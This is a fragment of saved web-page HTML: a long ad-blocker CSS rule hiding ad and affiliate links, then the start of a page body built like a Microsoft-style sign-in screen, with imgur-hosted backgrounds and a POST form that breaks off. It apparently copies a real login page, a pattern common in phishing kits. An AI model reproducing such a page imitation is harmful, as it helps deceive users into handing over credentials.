a[href^="http://4c7og3qcob.com/"], :root a[href^="http://aff.ironsocket.com/"], :root .Mpopup + #Mad > #MadZone, :root aside[itemtype="https://schema.org/WPAdBlock"], :root .__y_elastic .__y_item, :root a[href^="http://www.adxpansion.com"], :root a[href^="http://trk.mdrtrck.com/"], :root .__ywl .__y_item, :root .l-container > #fishtank, :root a[href^="https://a.adtng.com/"], :root .icons-rss-feed + .icons-rss-feed div[class$="_item"], :root a[href^="http://dethao.com/"], :root .lads[width="100%"][style="background:#FFF8DD"], :root iframe[src^="http://cdn2.adexprt.com/"], :root a[href^="https://retiremely.com/"], :root .mod > ._jH + .rscontainer, :root .mw > #rcnt > #center_col > #taw > #tvcap > .c, :root a[href^="http://clicks.binarypromos.com/"], :root .mw > #rcnt > #center_col > #taw > .c, :root .nrelate .nr_partner, :root a[href^="http://tezfiles.com/pr/"], :root [lazy-ad="leftbottom_banner"], :root .ob_container .item-container-obpd, :root a[href^="http://partner.sbaffiliates.com/"], :root a[href^="http://www.firstload.com/affiliate/"], :root a[href^="http://www.myfreepaysite.com/sfw_int.php?aid"], :root a[href^="//srv.buysellads.com/"], :root a[href^="http://click.payserve.com/"], :root a[href^="http://pwrads.net/"], :root .ob_dual_right > .ob_ads_header ~ .odb_div, :root .plistaList > .itemLinkPET, :root a[href^="http://www.download-provider.org/"], :root a[href^="//88d7b6aa44fb8eb.com/"], :root .plistaList > .plista_widget_underArticle_item[data-type="pet"], :root a[href^="http://www.pinkvisualgames.com/?revid="], :root .plista_widget_belowArticleRelaunch_item[data-type="pet"], :root .ra[align="left"][width="30%"], :root a[href^="http://ads.affbuzzads.com/"], :root a[href^="http://promos.bwin.com/"], :root a[href^="http://tracker.mybroadband.co.za/"], :root .ra[align="right"][width="30%"], :root a[href^="http://bs.serving-sys.com/"], :root a[href^="http://api.content.ad/"], :root a[href^="https://www.googleadservices.com/pagead/aclk?"], :root .ra[width="30%"][align="right"] + table[width="70%"][cellpadding="0"], :root a[href^="http://n217adserv.com/"], :root .rc-cta[data-target], :root .rhsvw[style="background-color:#fff;margin:0 0 14px;padding-bottom:1px;padding-top:1px;"], :root a[href^="https://land.rk.com/landing/"], :root .rscontainer > .ellip, :root a[href^="http://refpaano.host/"], :root .widget-pane-section-result[data-result-ad-type], :root a[href^="http://adserver.adtechus.com/"], :root .section-result[data-result-ad-type], :root .trc_rbox .syndicatedItem, :root .trc_rbox_border_elm .syndicatedItem, :root a[href^="http://taboola-"][href*="/redirect.php?app.type="], :root a[href^="https://topoffers.com/"][href*="/?pid="], :root .trc_rbox_div .syndicatedItem, :root .trc_rbox_div .syndicatedItemUB, :root div[id^="div_openx_ad_"], :root .trc_rbox_div a[target="_blank"][href^="http://tab"], :root a[href*=".irtyc.com/"], :root a[href^="//porngames.adult/?SID="], :root a[href^="http://engine.newsmaxfeednetwork.com/"], :root a[href^="https://www.camsoda.com/enter.php?id="], :root a[href*="=exoclick"], :root a[href^="//zenhppyad.com/"], :root a[href^="http://ddownload39.club/"], :root .trc_related_container div[data-item-syndicated="true"], :root .vi-lb-placeholder[title="ADVERTISEMENT"], :root a[href^="http://landingpagegenius.com/"], :root a[href^="//api.ad-goi.com/"], :root a[href^="https://dcs.adgear.com/clicks/"], :root a[href^="http://refer.webhostingbuzz.com/"], :root AD-TRIPLE-BOX, :root ADS-RIGHT, :root a[href^="http://campaign.bharatmatrimony.com/track/"], :root a[href*="/adServe/banners?"], :root AFS-AD, :root a[onmousedown^="this.href='http://paid.outbrain.com/network/redir?"][target="_blank"], :root AMP-AD, :root [onclick^="window.open('window.open('//delivery.trafficfabrik.com/"], :root DFP-AD, :root FBS-AD, :root a[href^="http://clickandjoinyourgirl.com/"], :root div[id^="advads-"], :root a[href^="http://buysellads.com/"], :root LEADERBOARD-AD, :root a[href^="http://sharesuper.info/"], :root [ad-id^="googlead"], :root [href*="//xml.revrtb.com/"], :root a[href^="https://djtcollectorclub.org/"][href*="?affiliate_id="], :root a[href^="http://rekoverr.com/"], :root [href^="https://maskip.co/"], :root [id*="MGWrap"], :root a[href^="//ads.ad-center.com/"], :root a[href^="http://websitedhoome.com/"], :root [id*="MarketGid"], :root a[href^="https://www.pornhat.com/"][rel="nofollow"], :root [id*="ScriptRoot"], :root a[href^="http://secure.cbdpure.com/aff/"], :root a[href^="http://www.seekbang.com/cs/"], :root [id^="bunyad_ads_"], :root [lazy-ad="leftthin_banner"], :root a[onmousedown^="this.href='http://staffpicks.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[href^="http://games.ucoz.ru/"][target="_blank"], :root [lazy-ad="lefttop_banner"], :root [lazy-ad="top_banner"], :root [onclick*="content.ad/"], :root a[href^="http://see-work.info/"], :root a[href^="http://www.graboid.com/affiliates/"], :root a[href^="http://papi.mynativeplatform.com:80/pub2/"], :root [onclick^="window.open('http://adultfriendfinder.com/search/"], :root a[href^="http://www.ducksnetwork.com/"], :root [onclick^="window.open('https://www.brazzersnetwork.com/landing/"], :root a[href^="http://www.bet365.com/"][href*="?affiliate="], :root [src^="/Redirect.a2b?"], :root a[data-oburl^="http://paid.outbrain.com/network/redir?"], :root a[data-oburl^="https://paid.outbrain.com/network/redir?"], :root a[data-redirect^="http://click.plista.com/pets"], :root a[data-redirect^="http://paid.outbrain.com/network/redir?"], :root a[href^="http://go.ad2up.com/"], :root a[href^="http://adtransfer.net/"], :root a[href^="http://adclick.g.doubleclick.net/"], :root a[data-redirect^="this.href='http://paid.outbrain.com/network/redir?"], :root div[class*="_AdInArticle_"], :root a[href^="https://track.clickmoi.xyz/"], :root a[data-url^="http://paid.outbrain.com/network/redir?"], :root a[data-url^="http://paid.outbrain.com/network/redir?"] + .author, :root a[href^="http://ad.yieldmanager.com/"], :root a[href^="http://www.myfreepaysite.com/sfw.php?aid"], :root a[href^="//4f6b2af479d337cf.com/"], :root a[href^="http://lp.ezdownloadpro.info/"], :root a[data-widget-outbrain-redirect^="http://paid.outbrain.com/network/redir?"], :root a[href$="/vghd.shtml"], :root a[href^="http://amzn.to/"] > img[src^="data"], :root a[href*=".adk2x.com/"], :root a[href^="//z6naousb.com/"], :root a[href^="//5e1fcb75b6d662d.com/"], :root a[href*=".adsrv.eacdn.com/"] > img, :root a[href^="//www.mgid.com/"], :root a[href^="http://www.clkads.com/adServe/"], :root a[href^="http://ad.doubleclick.net/"], :root a[href*=".allsports4you.club"], :root a[href^="http://googleads.g.doubleclick.net/pcs/click"], :root a[href^="https://uncensored.game/"], :root a[href*=".approvallamp.club/"], :root a[href^="http://connectlinking6.com/"], :root div[id^="ad-position-"], :root a[href*=".bang.com/"][href*="&aff="], :root a[href*=".clkcln.com/"], :root a[href^="http://guideways.info/"], :root a[href*=".ichlnk.com/"], :root div[class^="largeRectangleAd_"], :root a[href*=".inclk.com/"], :root a[href*=".intab.fun/"], :root a[href^="//awejmp.com/"], :root a[href*=".revimedia.com/"], :root a[href*=".trust.zone"], :root a[href*="//xml.revrtb.com/"], :root a[href^="http://www.1clickmoviedownloader.info/"], :root a[href^="https://www.friendlyduck.com/AF_"], :root a[href^="http://feeds1.validclick.com/"], :root a[href*="//3wr110.xyz/"], :root a[href^="http://eclkmpsa.com/"], :root a[href*="//ridingintractable.com/"], :root a[href^="http://www.coinducks.com/"], :root div[id^="dfp-ad-"], :root a[href*="/adrotate-out.php?"], :root a[href^="https://servedbyadbutler.com/"], :root a[href*="/cmd.php?ad="], :root a[href*="/servlet/click/zone?"], :root a[href*="5iclx7wa4q.com"], :root a[href^="http://feedads.g.doubleclick.net/"], :root a[href*="=Adtracker"], :root a[href^="http://www.downloadweb.org/"], :root a[href^="http://affiliates.score-affiliates.com/"], :root a[href*="=adscript"], :root div > [class][onclick*=".updateAnalyticsEvents"], :root a[href*="?adlivk="][href*="&refer="], :root a[href^="http://www.afco2go.com/srv.php?"], :root a[onmousedown^="this.href='https://paid.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[href^="http://betahit.click/"], :root a[href^="http://hyperies.info/"], :root iframe[id^="google_ads_frame"], :root a[href*="a2g-secure.com"], :root a[href*="ad2upapp.com/"], :root a[href*="delivery.trafficfabrik.com"], :root a[href^="https://members.linkifier.com/public/affiliateLanding?refCode="], :root a[href^="//www.pd-news.com/"], :root a[href*="googleme.eu"], :root a[href*="letsadvertisetogether.com"], :root a[href^="http://bonusfapturbo.nmvsite.com/"], :root a[href^="http://www.streamtunerhd.com/signup?"], :root a[href*="onclkds."], :root a[href^="https://badoinkvr.com/"], :root a[href*="pussl3.com"], :root a[href^="https://iactrivago.ampxdirect.com/"], :root a[href^=" http://ads.ad-center.com/"], :root a[href^=" http://n47adshostnet.com/"], :root div[id^="ads300_250-widget"], :root a[href^=" http://www.sex.com/"][href*="&utm_"], :root a[href^="//adbit.co/?a=Advertise&"], :root a[href^="http://secure.signup-way.com/"], :root a[href^="//bwnjijl7w.com/"], :root a[href^="//db52cc91beabf7e8.com/"], :root a[href^="http://tracking.deltamediallc.com/"], :root a[href^="//go.onclasrv.com/"], :root a[href^="//healthaffiliate.center/"], :root a[href^="http://www.revenuehits.com/"], :root a[href^="//jsmptjmp.com/"], :root a[href^="//look.djfiln.com/"], :root a[href^="//medleyads.com/spot/"], :root a[href^="http://onclickads.net/"], :root a[href^="//nlkdom.com/"], :root a[href^="http://www.streamate.com/exports/"], :root a[href^="http://click.plista.com/pets"], :root a[href^="//t.MtagMonetizationA.com/"], :root a[href^="http://spygasm.com/track?"], :root a[href^="//voyeurhit.com/cs/"], :root a[href^="http://1phads.com/"], :root div[id^="ads250_250-widget"], :root a[href^="http://2pxg8bcf.top/"], :root a[href^="http://www.clickansave.net/"], :root a[href^="http://360ads.go2cloud.org/"], :root a[href^="http://paid.outbrain.com/network/redir?"], :root a[href^="http://track.affiliatenetwork.co.za/"], :root a[href^="http://45eijvhgj2.com/"], :root a[href^="http://6kup12tgxx.com/"], :root a[href^="http://9nl.es/"], :root a[href^="http://NowDownloadAll.com"], :root a[href^="http://www.sex.com/videos/?utm_"], :root a[href^="http://www.mysuperpharm.com/"], :root a[href^="http://a.adquantix.com/"], :root a[href^="http://a63t9o1azf.com/"], :root a[href^="http://abc2.mobile-10.com/"], :root a[href^="http://ad-emea.doubleclick.net/"], :root a[href^="http://ad.au.doubleclick.net/"], :root a[href^="http://vo2.qrlsx.com/"], :root a[href^="http://adexprt.me/"], :root a[href^="http://adf.ly/?id="], :root a[href^="http://api.ringtonematcher.com/"], :root a[href^="http://adfarm.mediaplex.com/"], :root a[href^="http://www.babylon.com/welcome/index?affID"], :root a[href^="http://adserving.unibet.com/"], :root a[href^="https://secure.adnxs.com/clktrb?"], :root a[href^="http://adlev.neodatagroup.com/"], :root a[href^="http://adprovider.adlure.net/"], :root a[href^="http://pan.adraccoon.com?"], :root div[id^="lazyad-"], :root a[href^="http://bcp.crwdcntrl.net/"], :root a[href^="http://adrunnr.com/"], :root a[href^="http://www.fpcTraffic2.com/blind/in.cgi?"], :root a[href^="http://ads.activtrades.com/"], :root a[href^="http://mmo123.co/"], :root div[class^="index_adAfterContent_"], :root a[href^="http://ads.ad-center.com/"], :root a[href^="http://ads.sprintrade.com/"], :root a[href^="http://zevera.com/afi.html"], :root a[href^="http://ads.expekt.com/affiliates/"], :root a[href^="http://ads.pheedo.com/"], :root a[href^="http://ads2.williamhill.com/redirect.aspx?"], :root a[href^="http://cwcams.com/landing/click/"], :root a[href^="http://adserver.adreactor.com/"], :root a[href^="http://adserver.adtech.de/"], :root a[href^="http://www.1clickdownloader.com/"], :root a[href^="http://cdn3.adbrau.com/"], :root a[href^="http://adserver.itsfogo.com/"], :root a[href^="http://adserving.liveuniversenetwork.com/"], :root a[href^="http://adsrv.keycaptcha.com"], :root a[href^="http://adtrack123.pl/"], :root a[href^="http://green.trafficinvest.com/"], :root a[href^="http://clickserv.sitescout.com/"], :root a[href^="http://adtrackone.eu/"], :root a[href^="http://adultfriendfinder.com/p/register.cgi?pid="], :root a[href^="http://linksnappy.com/?ref="], :root a[href^="http://affiliate.glbtracker.com/"], :root a[href^="http://affiliate.godaddy.com/"], :root a[href^="http://www.accuserveadsystem.com/accuserve-go.php?"], :root a[href^="https://sexdatingz.live/"], :root a[href^="http://lp.ilivid.com/"], :root a[href^="http://searchtabnew.com/"], :root a[href^="http://affiliates.pinnaclesports.com/processing/"], :root div[id^="block-views-topheader-ad-block-"], :root a[href^="http://www.gamebookers.com/cgi-bin/intro.cgi?"], :root a[href^="http://aflrm.com/"], :root a[href^="http://anonymous-net.com/"], :root a[href^="http://mojofun.info/"], :root a[href^="http://findersocket.com/"], :root iframe[src^="http://ad.yieldmanager.com/"], :root a[href^="http://at.atwola.com/"], :root a[href^="http://record.sportsbetaffiliates.com.au/"], :root a[href^="http://azmobilestore.co/"], :root a[href^="http://easydownload4you.com/"], :root a[href^="http://www.moneyducks.com/"], :root a[href^="http://b.bestcompleteusa.info/"], :root a[href^="http://bc.vc/?r="], :root a[href^="http://bcntrack.com/"], :root a[href^="http://pokershibes.com/index.php?ref="], :root a[href^="http://www.friendlyadvertisements.com/"], :root div[id^="ads300_600-widget"], :root a[href^="http://bestchickshere.com/"], :root a[href^="http://bluehost.com/track/"], :root a[href^="https://jmp.awempire.com/"], :root a[href^="http://databass.info/"], :root a[href^="http://c.actiondesk.com/"], :root a[href^="http://c.jumia.io/"], :root a[href^="http://c.ketads.com/"], :root a[href^="http://www.bet365.com/"][href*="&affiliate="], :root a[href^="http://callville.xyz/"], :root a[href^="http://media.paddypower.com/redirect.aspx?"], :root a[href^="http://campaign.bharatmatrimony.com/cbstrack/"], :root a[href^="http://campeeks.com/"][href*="&utm_"], :root a[href^="http://casino-x.com/?partner"], :root a[href^="http://cdn.adsrvmedia.net/"], :root a[href^="https://land.brazzersnetwork.com/landing/"], :root a[href^="http://web.adblade.com/"], :root div[data-subscript="Advertising"], :root a[href^="http://cdn3.adexprts.com/"], :root a[href^="http://go.oclaserver.com/"], :root a[href^="http://chaturbate.com/affiliates/"], :root script[src^="http://free-shoutbox.net/app/webroot/shoutbox/sb.php?shoutbox="] + #freeshoutbox_content, :root div[itemtype="http://schema.org/WPAdBlock"], :root a[href^="http://cinema.friendscout24.de?"], :root a[href^="http://click.guamwnvgashbkashawhgkhahshmashcas.pw/"], :root a[href^="http://www.down1oads.com/"], :root a[href^="http://www.pheedo.com/"], :root a[href^="http://clicks.guamwnvgashbkashawhgkhahshmashcas.pw/"], :root a[href^="http://clk.directrev.com/"], :root a[href^="http://galleries.pinballpublishernetwork.com/"], :root div[class^="lifeOnwerAd"], :root a[target="_blank"][href^="http://api.taboola.com/"], :root a[href^="http://clkmon.com/adServe/"], :root a[href^="http://hdplugin.flashplayer-updates.com/"], :root a[href^="http://track.incognitovpn.com/"], :root div[id^="acm-ad-tag-"], :root a[href^="https://www.brazzersnetwork.com/landing/"], :root a[href^="http://codec.codecm.com/"], :root a[href^="http://n.admagnet.net/"], :root a[href^="http://prochina.space/"], :root a[href^="http://contractallsticker.net/"], :root a[href^="http://wgpartner.com/"], :root a[href^="https://go.stripchat.com/"][href*="&campaignId="], :root a[href^="http://cpaway.afftrack.com/"], :root a[href^="http://d2.zedo.com/"], :root div[id^="advt-"], :root a[href^="https://affiliates.bet-at-home.com/processing/"], :root a[href^="http://data.committeemenencyclopedicrepertory.info/"], :root div[class^="Ad__bigBox"], :root a[href^="http://data.linoleictanzaniatitanic.com/"], :root div[itemtype="http://www.schema.org/WPAdBlock"], :root a[href^="http://dftrck.com/"], :root a[href^="http://down1oads.com/"], :root a[href^="http://download-performance.com/"], :root a[href^="http://www.myfreecams.com/?co_id="][href*="&track="], :root a[href^="https://bs.serving-sys.com"], :root a[href^="http://duckcash.eu/"], :root a[href^="http://server.cpmstar.com/click.aspx?poolid="], :root a[href^="https://track.themadtrcker.com/"], :root a[href^="http://dwn.pushtraffic.net/"], :root a[href^="http://earandmarketing.com/"], :root a[href^="https://gogoman.me/"], :root a[href^="http://elite-sex-finder.com/?"], :root a[href^="https://transfer.xe.com/signup/track/redirect?"], :root a[href^="http://elitefuckbook.com/"], :root a[href^="http://ethfw0370q.com/"], :root a[href^="http://extra.bet365.com/"][href*="?affiliate="], :root a[href^="http://farm.plista.com/pets"], :root a[href^="http://freesoftwarelive.com/"], :root div[data-mediatype="advertising"], :root a[href^="http://webgirlz.online/landing/"], :root a[href^="http://fileloadr.com/"], :root a[href^="https://secure.eveonline.com/ft/?aid="], :root a[href^="http://fileupnow.rocks/"], :root a[href^="http://prousa.work/"], :root a[href^="http://fsoft4down.com/"], :root a[href^="http://track.trkvluum.com/"], :root a[href^="https://bullads.net/get/"], :root a[href^="http://fusionads.net"], :root a[href^="https://farm.plista.com/pets"], :root a[href^="http://galleries.securewebsiteaccess.com/"], :root a[href^="http://www.on2url.com/app/adtrack.asp"], :root a[href^="http://gca.sh/user/register?ref="], :root a[href^="http://getlinksinaseconds.com/"], :root a[href^="https://bongacams2.com/track?"], :root a[href^="http://go.seomojo.com/tracking202/"], :root a[href^="http://go.trafficshop.com/"], :root a[href^="http://www.getyourguide.com/?partner_id="], :root a[href^="http://goldmoney.com/?gmrefcode="], :root a[href^="http://greensmoke.com/"], :root a[href^="http://hd-plugins.com/download/"], :root a[href^="http://hpn.houzz.com/"], :root a[href^="http://tracking.crazylead.com/"], :root a[href^="http://hyperlinksecure.com/go/"], :root a[href^="http://igromir.info/"], :root a[href^="https://awejmp.com/"], :root a[href^="http://imads.integral-marketing.com/"], :root a[href^="http://install.securewebsiteaccess.com/"], :root a[href^="http://secure.signup-page.com/"], :root a[href^="http://www.brightwheel.info/"], :root a[href^="http://www.greenmangaming.com/?tap_a="], :root a[href^="http://intent.bingads.com/"], :root a[href^="http://internalredirect.site/"], :root a[href^="http://istri.it/?"], :root a[href^="http://jobitem.org/"], :root a[href^="http://liversely.com/"], :root a[href^="http://k2s.cc/code/"], :root a[href^="http://tracking.toroadvertising.com/"], :root a[href^="http://k2s.cc/pr/"], :root a[href^="http://keep2share.cc/pr/"], :root a[href^="http://latestdownloads.net/download.php?"], :root div[id^="ADV-SLOT-"], :root a[href^="http://liversely.net/"], :root a[href^="http://t.mdn2015x2.com/"], :root a[href^="http://mgid.com/"], :root a[href^="http://www.freefilesdownloader.com/"], :root a[href^="http://mo8mwxi1.com/"], :root div[class^="gemini-ad"], :root a[href^="http://online.ladbrokes.com/promoRedirect?"], :root a[href^="https://redirect.ero-advertising.com/"], :root a[href^="http://play4k.co/"], :root div[id^="ad-div-"], :root a[href^="http://popup.taboola.com/"], :root a[href^="http://uploaded.net/ref/"], :root a[href^="https://www.spyoff.com/"], :root a[href^="http://prochina.link/"], :root a[href^="http://record.betsafe.com/"], :root a[href^="http://record.commissionking.com/"], :root a[href^="http://s9kkremkr0.com/"], :root a[href^="http://www.123-reg.co.uk/affiliate2.cgi"], :root a[href^="http://secure.hostgator.com/~affiliat/"], :root a[href^="http://serve.williamhill.com/promoRedirect?"], :root a[href^="http://servicegetbook.net/"], :root a[href^="http://srvpub.com/"], :root a[href^="https://porngames.adult/?SID="], :root a[href^="http://stateresolver.link/"], :root a[href^="http://www.drowle.com/"], :root a[href^="https://keep2share.cc/pr/"], :root a[href^="http://steel.starflavor.bid/"], :root a[href^="https://www.adskeeper.co.uk/"], :root a[href^="http://syndication.exoclick.com/"], :root a[href^="http://t.mdn2015x3.com/"], :root a[href^="http://t.wowtrk.com/"], :root a[href^="http://tour.affbuzzads.com/"], :root a[href^="http://us.marketgid.com"], :root a[href^="http://vinfdv6b4j.com/"], :root a[href^="http://webtrackerplus.com/"], :root a[href^="http://wopertific.info/"], :root div[id^="cns_ads_"], :root a[href^="http://www.twinplan.com/AF_"], :root a[href^="http://www.TwinPlan.com/AF_"], :root a[href^="http://www.afgr3.com/"], :root a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"], :root a[href^="http://www.adskeeper.co.uk/"], :root a[href^="https://understandsolar.com/signup/?lead_source="][href*="&tracking_code="], :root a[href^="http://www.affiliates1128.com/processing/"], :root a[href^="http://www.downloadplayer1.com/"], :root a[href^="http://www.afgr2.com/"], :root a[href^="http://www.badoink.com/go.php?"], :root a[href^="http://www.bitlord.me/share/"], :root a[href^="http://www.bluehost.com/track/"] > img, :root bottomadblock, :root a[href^="http://www.cash-duck.com/"], :root a[href^="http://www.friendlyduck.com/AF_"], :root a[href^="https://windscribe.com/promo/"], :root a[href^="http://yads.zedo.com/"], :root a[href^="http://www.cdjapan.co.jp/aff/click.cgi/"], :root a[href^="http://www.dl-provider.com/search/"], :root a[href^="http://www.downloadthesefiles.com/"], :root a[href^="http://www.duckcash.eu/"], :root a[href^="http://www.duckssolutions.com/"], :root a[href^="http://www.easydownloadnow.com/"], :root a[href^="http://www.epicgameads.com/"], :root a[href^="http://www.faceporn.net/free?"], :root a[href^="http://www.fducks.com/"], :root a[href^="https://torguard.net/aff.php"], :root a[href^="http://www.firstclass-download.com/"], :root a[href^="http://www.firstload.de/affiliate/"], :root a[href^="http://www.fonts.com/BannerScript/"], :root a[href^="http://www.flashx.tv/downloadthis"], :root a[href^="http://www.fleshlight.com/"], :root a[href^="http://www.friendlyquacks.com/"], :root a[href^="https://www.goldenfrog.com/vyprvpn?offer_id="][href*="&aff_id="], :root a[href^="http://www.hitcpm.com/"], :root a[href^="https://pubads.g.doubleclick.net/"], :root a[href^="http://www.idownloadplay.com/"], :root a[href^="http://www.incredimail.com/?id="], :root a[href^="https://tracking.truthfinder.com/?a="], :root a[href^="http://www.installads.net/"], :root a[href^="http://www.ireel.com/signup?ref"], :root a[href^="http://www.liutilities.com/"], :root a[href^="http://www.liversely.net/"], :root a[href^="http://www.menaon.com/installs/"], :root a[href^="http://www.mobileandinternetadvertising.com/"], :root a[href^="http://www.my-dirty-hobby.com/?sub="], :root a[href^="http://www.myvpn.pro/"], :root a[href^="http://www.paddypower.com/?AFF_ID="], :root a[href^="http://www.pinkvisualpad.com/?revid="], :root a[href^="http://www.plus500.com/?id="], :root header#hdr + #main > div[data-hveid], :root a[href^="http://www.quick-torrent.com/download.html?aff"], :root a[href^="http://www.ragazzeinvendita.com/?rcid="], :root a[href^="http://www.richducks.com/"], :root a[href^="http://www.ringtonematcher.com/"], :root a[href^="http://www.roboform.com/php/land.php"], :root a[href^="http://www.securegfm.com/"], :root a[href^="http://www.sex.com/?utm_"], :root a[href^="http://www.sex.com/pics/?utm_"], :root div[class^="Ad__adContainer"], :root a[href^="http://www.sexgangsters.com/?pid="], :root a[href^="http://www.sfippa.com/"], :root a[href^="http://www.socialsex.com/"], :root a[href^="http://www.text-link-ads.com/"], :root a[href^="http://www.tirerack.com/affiliates/"], :root a[href^="http://www.torntv-downloader.com/"], :root a[href^="http://www.torntvdl.com/"], :root a[href^="http://www.uniblue.com/cm/"], :root a[href^="http://www.urmediazone.com/signup"], :root a[href^="http://www.usearchmedia.com/signup?"], :root a[href^="https://secure.cbdpure.com/aff/"], :root a[href^="http://www.wantstraffic.com/"], :root a[href^="http://www.xmediaserve.com/"], :root a[href^="http://www.yourfuckbook.com/?"], :root a[href^="http://www.zergnet.com/i/"], :root a[onclick*="//m.economictimes.com/etmack/click.htm"], :root a[href^="http://www1.clickdownloader.com/"], :root a[href^="http://www5.smartadserver.com/call/pubjumpi/"], :root a[href^="http://wxdownloadmanager.com/dl/"], :root a[href^="http://xads.zedo.com/"], :root a[href^="http://xtgem.com/click?"], :root div[id^="div-adtech-ad-"], :root div[id^="ad-gpt-"], :root a[href^="http://y1jxiqds7v.com/"], :root div[id^="div_ad_stack_"], :root a[href^="http://z1.zedo.com/"], :root a[href^="https://ad.doubleclick.net/"], :root a[href^="https://adclick.g.doubleclick.net/"], :root a[href^="https://adhealers.com/"], :root a[href^="https://ads.ad4game.com/"], :root a[href^="https://adserver.adreactor.com/"], :root a[href^="https://www.incontri-matura.com/"], :root a[href^="https://adultfriendfinder.com/go/page/landing"], :root a[href^="https://adswick.com/"], :root a[href^="https://atomidownload.com/"], :root a[href^="https://awentw.com/"], :root a[href^="https://betway.com/"][href*="&a="], :root a[href^="https://chaturbate.com/in/?track="], :root a[href^="https://chaturbate.com/affiliates/"], :root a[href^="https://chaturbate.com/in/?tour="], :root a[href^="https://chaturbate.jjgirls.com/"][href*="?tour="], :root a[href^="https://chaturbate.xyz/"], :root a[href^="https://click.plista.com/pets"], :root a[href^="https://clixtrac.com/"], :root a[href^="https://dediseedbox.com/clients/aff.php?"], :root a[href^="https://dltags.com/"], :root a[href^="https://evaporate.pw/"], :root td[valign="top"] > .mainmenu[style="padding:10px 0 0 0 !important;"], :root a[href^="https://flirtaescopa.com/"], :root a[href^="https://freeadult.games/"], :root a[href^="https://intrev.co/"], :root a[href^="https://gamescarousel.com/"], :root a[href^="https://m.do.co/c/"] > img, :root a[href^="https://gghf.mobi/"], :root a[href^="https://go.ad2up.com/"], :root a[href^="https://go.onclasrv.com/"], :root a[href^="https://go.trkclick2.com/"], :root a[href^="https://googleads.g.doubleclick.net/pcs/click"], :root a[href^="https://iac.ampxdirect.com/"], :root a[href^="https://ilovemyfreedoms.com/"][href*="?affiliate_id="], :root a[href^="https://incisivetrk.cvtr.io/click?"], :root a[href^="https://lingthatsparleso.info/"], :root a[href^="https://medleyads.com/"], :root a[href^="https://mk-ads.com/"], :root a[href^="https://mk-cdn.net/"], :root a[href^="https://paid.outbrain.com/network/redir?"], :root a[href^="https://zononi.com/"], :root a[href^="https://porndeals.com/?track="], :root a[href^="https://prf.hn/click/"][href*="/adref:"], :root a[href^="https://refpaano.host/"], :root a[href^="https://www.moscarossa.biz/"], :root a[href^="https://rev.adsession.com/"], :root a[href^="https://secure.bstlnk.com/"], :root a[href^="https://spygasm.com/track?"], :root a[href^="https://squren.com/rotator/?atomid="], :root a[href^="https://syndication.exoclick.com/splash.php?"], :root a[href^="https://t.mobtya.com/"], :root a[href^="https://track.52zxzh.com/"], :root a[href^="https://track.adform.net/"], :root a[href^="https://track.healthtrader.com/"], :root a[href^="https://track.trkinator.com/"], :root div[id^="ad-server-"], :root a[href^="https://trackjs.com/?utm_source"], :root a[href^="https://trafficmedia.center/"], :root a[href^="https://trklvs.com/"], :root a[href^="https://trust.zone/go/r.php?RID="], :root a[href^="https://www.oboom.com/ad/"], :root a[href^="https://uncensored3d.com/"], :root p[id^="div-gpt-ad-"], :root a[href^="https://vodexor.us/"], :root a[href^="https://www.adultempire.com/"][href*="?partner_id="], :root a[href^="https://www.adxtro.com/"], :root a[href^="https://www.bebi.com"], :root a[href^="https://www.camyou.com/?cam="][href*="&track="], :root a[href^="https://www.dsct1.com/"], :root a[href^="https://www.nutaku.net/signup/landing/"], :root a[href^="https://www.popads.net/users/"], :root a[href^="https://www.share-online.biz/affiliate/"], :root a[href^="https://www.what-sexdating.com/"], :root a[onmousedown^="this.href='/wp-content/embed-ad-content/"], :root a[onmousedown^="this.href='http://paid.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[onmousedown^="this.href='https://paid.outbrain.com/network/redir?"][target="_blank"], :root div[id^="div-gpt-ad"], :root a[style="display:block;width:300px;min-height:250px"][href^="http://li.cnet.com/click?"], :root a[target="_blank"][onmousedown="this.href^='http://paid.outbrain.com/network/redir?"], :root aside[id^="adrotate_widgets-"], :root aside[id^="advads_ad_widget-"], :root aside[id^="div-gpt-ad"], :root aside[id^="tn_ads_widget-"], :root div[class$="dealnews"] > .dealnews, :root div[class^="AdhesionAd_"], :root div[class^="BlockAdvert-"], :root div[class^="ResponsiveAd-"], :root div[class^="ad_border_"], :root div[class^="ad_position_"], :root div[class^="adbanner_"], :root div[class^="adpubs-"], :root div[class^="awpcp-random-ads"], :root div[class^="backfill-taboola-home-slot-"], :root div[class^="block-openx-"], :root div[class^="index_adBeforeContent_"], :root div[class^="index_displayAd_"], :root div[class^="local-feed-banner-ads"], :root div[class^="pane-google-admanager-"], :root div[class^="proadszone-"], :root div[data-ad-underplayer], :root div[data-flt-ve="sponsored_search_ads"], :root div[data-native_ad], :root div[data-spotim-slot], :root div[id^="YFBMSN"], :root div[id^="ad-cid-"], :root div[id^="proadszone-"], :root div[id^="ad_bigbox_"], :root div[id^="adfox_"], :root div[id^="adrotate_widgets-"], :root div[id^="ads120_600-widget"], :root div[id^="adspot-"], :root div[id^="dfp-slot-"], :root div[id^="div-ads-"], :root div[id^="dmRosAdWrapper"], :root topadblock, :root div[id^="drudge-column-ads-"], :root div[id^="google_dfp_"], :root div[id^="q1-adset-"], :root div[id^="tms-ad-dfp-"], :root div[id^="zergnet-widget"], :root div[role="navigation"] + c-wiz > div > .kxhcC, :root div[role="navigation"] + c-wiz > script + div > .kxhcC, :root iframe[id^="google_ads_iframe"], :root iframe[src^="http://cdn1.adexprt.com/"], :root iframe[src^="http://static.mozo.com.au/strips/"], :root img[alt^="Fuckbook"], :root input[onclick^="window.open('http://www.friendlyduck.com/"], :root input[onclick^="window.open('http://www.FriendlyDuck.com/"] { display: none !important; }</style></head><body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><!-- --> <div data-bind="component: { name: 'background-image-control', publicMethods: backgroundControlMethods }"><div class="background" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }"><!-- ko if: smallImageUrl --> <div data-bind="backgroundImage: smallImageUrl()" style="background-image: url(&quot;https://i.imgur.com/u3AoB0V.png&quot;);"></div><!-- /ko --><!-- ko if: backgroundImageUrl --> <div class="backgroundImage" data-bind="backgroundImage: backgroundImageUrl()" style="background-image: url(&quot;https://i.imgur.com/1j9Rist.png&quot;);"></div><!-- ko if: useImageMask --><!-- /ko --><!-- /ko --> </div></div> <div data-bind="if: activeDialog"></div> <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="POST" target="_top" name="Email" 